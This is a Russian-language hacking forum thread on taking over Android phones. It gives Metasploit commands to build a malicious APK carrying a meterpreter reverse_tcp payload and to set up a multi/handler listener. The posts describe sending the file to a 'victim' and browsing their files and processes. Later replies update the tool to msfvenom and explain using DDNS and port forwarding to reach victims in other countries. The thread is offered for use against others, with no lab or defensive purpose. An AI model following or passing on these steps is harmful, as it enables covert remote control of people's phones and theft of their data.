Взлом андроида

MirTex

ОПЫТНЫЙ USER
Регистрация
9 Ноя 2021
Сообщения
138
Реакции
33
Откройте Кали Linux Терминал и водим:

root@kali:~# msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.128 LPORT=31337 R > /root/Desktop/any.apk

-p для полезной нагрузки android/meterpreter/reverse_tcp

Lhost (IP-адрес вашего локального хоста) 192.168.0.128

Lport (Порт локального ПК) 31337

-R формат Выходного формата

Теперь мы успешно создали вредоносных APK Файл, она будет храниться на локальном компьютере

/root/Desktop/files.apk

Сейчас нужно отправить files.apk файл жертве, как только он загрузит и откройт его. Теперь вы можете получить доступ к meterpreter shell на жертвы Android Phone.


Теперь откройте вновь вашу Кали linux терминал и введите msfconsole

Нужно настроить прослушиватель событий, чтобы обрабатывать обратную связь, отправленных жертве, когда exploit успешно выполнены.

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.128

set lport 31337

exploit

LS

Как и в Linux, ‘ls’ команда выводит список файлов текущего удаленного каталога.

PS

Команда ‘ps’ отображает список запущенных процессов на цель
 
ЛЮДИ ВНИМАНИЕ!!! Вместо "msfpayload" используйте "msfvenom" так как первый вариант уже давно не используется и работать не будет.
 
Этот вариант будет работать только в локальной сети, но если вы создадите постоянный DDNS адресс например в no-ip(не реклама) и пробросите порт payload'а в роутере и вместо своего ip забьёте DDNS то это всё сможет работать и во внешнем интернете даже если жертва в другой стране. Проверенно.
 
Назад
Сверху